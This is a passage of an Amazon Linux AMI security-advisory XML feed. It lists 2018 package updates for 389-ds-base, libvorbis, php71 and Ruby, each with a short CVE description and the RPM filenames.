version="2.3.6" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-2.3.6-1.18.amzn1.x86_64.rpm</filename></package><package name="ruby23-libs" version="2.3.6" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-libs-2.3.6-1.18.amzn1.x86_64.rpm</filename></package><package name="ruby23-irb" version="2.3.6" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-irb-2.3.6-1.18.amzn1.noarch.rpm</filename></package><package name="rubygems23" version="2.5.2.2" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-2.5.2.2-1.18.amzn1.noarch.rpm</filename></package><package name="ruby23-doc" version="2.3.6" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-doc-2.3.6-1.18.amzn1.noarch.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-psych-2.1.0.1-1.18.amzn1.x86_64.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-io-console-0.4.5-1.18.amzn1.x86_64.rpm</filename></package><package name="rubygem23-did_you_mean" version="1.0.0" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-did_you_mean-1.0.0-1.18.amzn1.noarch.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-json-1.8.3.1-1.18.amzn1.x86_64.rpm</filename></package><package name="rubygems23-devel" version="2.5.2.2" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-devel-2.5.2.2-1.18.amzn1.noarch.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.6" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-debuginfo-2.3.6-1.18.amzn1.x86_64.rpm</filename></package><package name="ruby23-devel" version="2.3.6" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-devel-2.3.6-1.18.amzn1.x86_64.rpm</filename></package><package name="rubygem23-json" version="1.8.3.1" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-json-1.8.3.1-1.18.amzn1.i686.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-psych-2.1.0.1-1.18.amzn1.i686.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.6" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-debuginfo-2.3.6-1.18.amzn1.i686.rpm</filename></package><package name="rubygem23-bigdecimal" version="1.2.8" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-bigdecimal-1.2.8-1.18.amzn1.i686.rpm</filename></package><package name="ruby23-libs" version="2.3.6" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-libs-2.3.6-1.18.amzn1.i686.rpm</filename></package><package name="rubygem23-io-console" version="0.4.5" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem23-io-console-0.4.5-1.18.amzn1.i686.rpm</filename></package><package name="ruby23-devel" version="2.3.6" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-devel-2.3.6-1.18.amzn1.i686.rpm</filename></package><package name="ruby23" version="2.3.6" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/ruby23-2.3.6-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-980</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-980: important priority package update for 389-ds-base</title><issued date="2018-04-05 15:55:00" /><updated date="2018-04-05 23:07:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-1054:
An out-of-bounds memory read flaw was found in the way 389-ds-base handled certain LDAP search filters. A remote, unauthenticated attacker could potentially use this flaw to make ns-slapd crash via a specially crafted LDAP request, thus resulting in denial of service.
1537314:
CVE-2018-1054 389-ds-base: remote Denial of Service (DoS) via search filters in SetUnicodeStringFromUTF_8 in collate.c
CVE-2017-15135:
It was found that 389-ds-base did not always handle internal hash comparison operations correctly during the authentication process. A remote, unauthenticated attacker could potentially use this flaw to bypass the authentication process under very rare and specific circumstances.
1525628:
CVE-2017-15135 389-ds-base: Authentication bypass due to lack of size check in slapi_ct_memcmp function in ch_malloc.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15135" title="" id="CVE-2017-15135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1054" title="" id="CVE-2018-1054" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-devel" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.6.1-28.54.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-snmp-1.3.6.1-28.54.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.6.1-28.54.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-28.54.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.6.1-28.54.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.6.1-28.54.amzn1.i686.rpm</filename></package><package name="389-ds-base-snmp" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-snmp-1.3.6.1-28.54.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.6.1-28.54.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.6.1-28.54.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.6.1" release="28.54.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.6.1-28.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-981</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-981: critical priority package update for libvorbis</title><issued date="2018-04-05 15:57:00" /><updated date="2018-04-05 23:07:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-5146:
An out of bounds write flaw was found in the processing of vorbis audio data. A maliciously crafted file or audio stream could cause the application to crash or, potentially, execute arbitrary code.
1557221:
CVE-2018-5146 Mozilla: Vorbis audio processing out of bounds write (MFSA 2018-08)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5146" title="" id="CVE-2018-5146" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libvorbis-devel-docs" version="1.3.3" release="8.7.amzn1" epoch="1" arch="noarch"><filename>Packages/libvorbis-devel-docs-1.3.3-8.7.amzn1.noarch.rpm</filename></package><package name="libvorbis-devel" version="1.3.3" release="8.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-devel-1.3.3-8.7.amzn1.x86_64.rpm</filename></package><package name="libvorbis" version="1.3.3" release="8.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-1.3.3-8.7.amzn1.x86_64.rpm</filename></package><package name="libvorbis-debuginfo" version="1.3.3" release="8.7.amzn1" epoch="1" arch="x86_64"><filename>Packages/libvorbis-debuginfo-1.3.3-8.7.amzn1.x86_64.rpm</filename></package><package name="libvorbis-devel" version="1.3.3" release="8.7.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-devel-1.3.3-8.7.amzn1.i686.rpm</filename></package><package name="libvorbis" version="1.3.3" release="8.7.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-1.3.3-8.7.amzn1.i686.rpm</filename></package><package name="libvorbis-debuginfo" version="1.3.3" release="8.7.amzn1" epoch="1" arch="i686"><filename>Packages/libvorbis-debuginfo-1.3.3-8.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-982</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-982: important priority package update for php71</title><issued date="2018-03-27 21:37:00" /><updated date="2018-03-28 22:46:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7584:
In PHP through 5.6.33, 7.0.x before 7.0.28, 7.1.x through 7.1.14, and 7.2.x through 7.2.2, there is a stack-based buffer under-read while parsing an HTTP response in the php_stream_url_wrap_http_ex function in ext/standard/http_fopen_wrapper.c. This subsequently results in copying a large string.
1551039:
CVE-2018-7584 php: Stack-based buffer under-read in ext/standard/http_fopen_wrapper.c:php_stream_url_wrap_http_ex function when parsing HTTP response allows denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7584" title="" id="CVE-2018-7584" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php71-common" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-common-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-tidy" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-tidy-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-dba" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pgsql-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-enchant" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-enchant-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-odbc" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-odbc-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-dbg" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dbg-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-bcmath-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.15" release="1.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.15-1.31.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-common" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-common-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-tidy" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-tidy-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-opcache" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-opcache-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-ldap" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-ldap-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-dblib-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-pspell" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pspell-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-recode" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-recode-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-pdo" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pdo-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-bcmath" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-bcmath-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-mysqlnd" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mysqlnd-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-gmp" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gmp-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-snmp" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-snmp-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-cli" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-cli-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-embedded" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-embedded-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-xml" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xml-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-debuginfo" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-debuginfo-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-pgsql" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pgsql-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-process" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-process-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-enchant" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-enchant-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-gd" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-gd-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-mcrypt" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mcrypt-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-dbg" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dbg-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-odbc" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-odbc-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-devel" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-devel-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-fpm" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-fpm-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-mbstring" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-mbstring-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-intl" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-intl-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-soap" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-soap-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-imap" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-imap-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-json" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-json-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-dba-7.1.15-1.31.amzn1.i686.rpm</filename></package><package name="php71-xmlrpc" version="7.1.15" release="1.31.amzn1" epoch="0" arch="i686"><filename>Packages/php71-xmlrpc-7.1.15-1.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-983</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-983: medium priority package update for ruby20 ruby22 ruby23 ruby24</title><issued date="2018-04-04 23:18:00" /><updated date="2018-05-10 23:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-8780:
It was found that the methods from the Dir class did not properly handle strings containing the NULL byte. An attacker, able to inject NULL bytes in a path, could possibly trigger an unspecified behavior of the ruby script.
1561949:
CVE-2018-8780 ruby: Unintentional directory traversal by poisoned NULL byte in Dir
CVE-2018-8779:
It was found that the UNIXSocket::open and UNIXServer::open ruby methods did not handle the NULL byte properly. An attacker, able to inject NULL bytes in the socket path, could possibly trigger an unspecified behavior of the ruby script.
1561948:
CVE-2018-8779 ruby: Unintentional socket creation by poisoned NULL byte in UNIXServer and UNIXSocket
CVE-2018-8778:
A integer underflow was found in the way String#unpack decodes the unpacking format. An attacker, able to control the unpack format, could use this flaw to disclose arbitrary parts of the application&#039;s memory.
1561953:
CVE-2018-8778 ruby: Buffer under-read in String#unpack
CVE-2018-8777:
It was found that WEBrick could be forced to use an excessive amount of memory during the processing of HTTP requests, leading to a Denial of Service. An attacker could use this flaw to send huge requests to a WEBrick application, resulting in the server running out of memory.
1561950:
CVE-2018-8777 ruby: DoS by large request in WEBrick
CVE-2018-6914:
It was found that the tmpdir and tempfile modules did not sanitize their file name argument. An attacker with control over the name could create temporary files and directories outside of the dedicated directory.
1561947:
CVE-2018-6914 ruby: Unintentional file and directory creation with directory traversal in tempfile and tmpdir
CVE-2018-1000079:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains a Directory Traversal vulnerability in gem installation that can result in the gem could write to arbitrary filesystem locations during installation. This attack appear to be exploitable via the victim must install a malicious gem. This vulnerability appears to have been fixed in 2.7.6.
1547426:
CVE-2018-1000079 rubygems: Path traversal issue during gem installation allows to write to arbitrary filesystem locations
CVE-2018-1000078:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains a Cross Site Scripting (XSS) vulnerability in gem server display of homepage attribute that can result in XSS. This attack appear to be exploitable via the victim must browse to a malicious gem on a vulnerable gem server. This vulnerability appears to have been fixed in 2.7.6.
1547425:
CVE-2018-1000078 rubygems: XSS vulnerability in homepage attribute when displayed via gem server
CVE-2018-1000077:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains a Improper Input Validation vulnerability in ruby gems specification homepage attribute that can result in a malicious gem could set an invalid homepage URL. This vulnerability appears to have been fixed in 2.7.6.
1547422:
CVE-2018-1000077 rubygems: Missing URL validation on spec home attribute allows malicious gem to set an invalid homepage URL
CVE-2018-1000076:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains a Improper Verification of Cryptographic Signature vulnerability in package.rb that can result in a mis-signed gem could be installed, as the tarball would contain multiple gem signatures.. This vulnerability appears to have been fixed in 2.7.6.
1547421:
CVE-2018-1000076 rubygems: Improper verification of signatures in tarball allows to install mis-signed gem
CVE-2018-1000075:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains a infinite loop caused by negative size vulnerability in ruby gem package tar header that can result in a negative size could cause an infinite loop.. This vulnerability appears to have been fixed in 2.7.6.
1547420:
CVE-2018-1000075 rubygems: Infinite loop vulnerability due to negative size in tar header causes Denial of Service
CVE-2018-1000074:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains a Deserialization of Untrusted Data vulnerability in owner command that can result in code execution. This attack appear to be exploitable via victim must run the `gem owner` command on a gem with a specially crafted YAML file. This vulnerability appears to have been fixed in 2.7.6.
1547419:
CVE-2018-1000074 rubygems: Unsafe Object Deserialization Vulnerability in gem owner allowing arbitrary code execution on specially crafted YAML
CVE-2018-1000073:
RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series: 2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and earlier, prior to trunk revision 62422 contains a Directory Traversal vulnerability in install_location function of package.rb that can result in path traversal when writing to a symlinked basedir outside of the root. This vulnerability appears to have been fixed in 2.7.6.
1547418:
CVE-2018-1000073 rubygems: Path traversal when writing to a symlinked basedir outside of the root
CVE-2017-17790:
The &quot;lazy_initialize&quot; function in lib/resolv.rb did not properly process certain filenames. A remote attacker could possibly exploit this flaw to inject and execute arbitrary commands.
1528218:
CVE-2017-17790 ruby: Command injection in lib/resolv.rb:lazy_initialize() allows arbitrary code execution
CVE-2017-17742:
It was found that WEBrick did not sanitize headers sent back to clients, resulting in a response-splitting vulnerability. An attacker, able to control the server&#039;s headers, could force WEBrick into injecting additional headers to a client.
1561952:
CVE-2017-17742 ruby: HTTP response splitting in WEBrick
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17742" title="" id="CVE-2017-17742" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17790" title="" id="CVE-2017-17790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000073" title="" id="CVE-2018-1000073" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000074" title="" id="CVE-2018-1000074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000075" title="" id="CVE-2018-1000075" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000076" title="" id="CVE-2018-1000076" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000077" title="" id="CVE-2018-1000077" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000078" title="" id="CVE-2018-1000078" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000079" title="" id="CVE-2018-1000079" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6914" title="" id="CVE-2018-6914" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8777" title="" id="CVE-2018-8777" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8778" title="" id="CVE-2018-8778" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8779" title="" id="CVE-2018-8779" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8780" title="" id="CVE-2018-8780" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby23-libs" version="2.3.7" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-libs-2.3.7-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygems23-devel" version="2.5.2.3" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems23-devel-2.5.2.3-1.19.amzn1.noarch.rpm</filename></package><package name="rubygem23-psych" version="2.1.0.1" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem23-psych-2.1.0.1-1.19.amzn1.x86_64.rpm</filename></package><package name="ruby23-debuginfo" version="2.3.7" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby23-debuginfo-2.3.7-1.19.amzn1.x86_64.rpm</filename></package><package name="rubygem23-did_you_mean" version="1.0.0" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem23-did_you_mean-1.0.0-1.19.amzn1.noarch.rpm</filename></package><package name="ruby23-doc" version="2.3.7" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby23-doc-2.3.7-1.19.amzn1.noarch.rpm</filename></package><package name="ruby23" 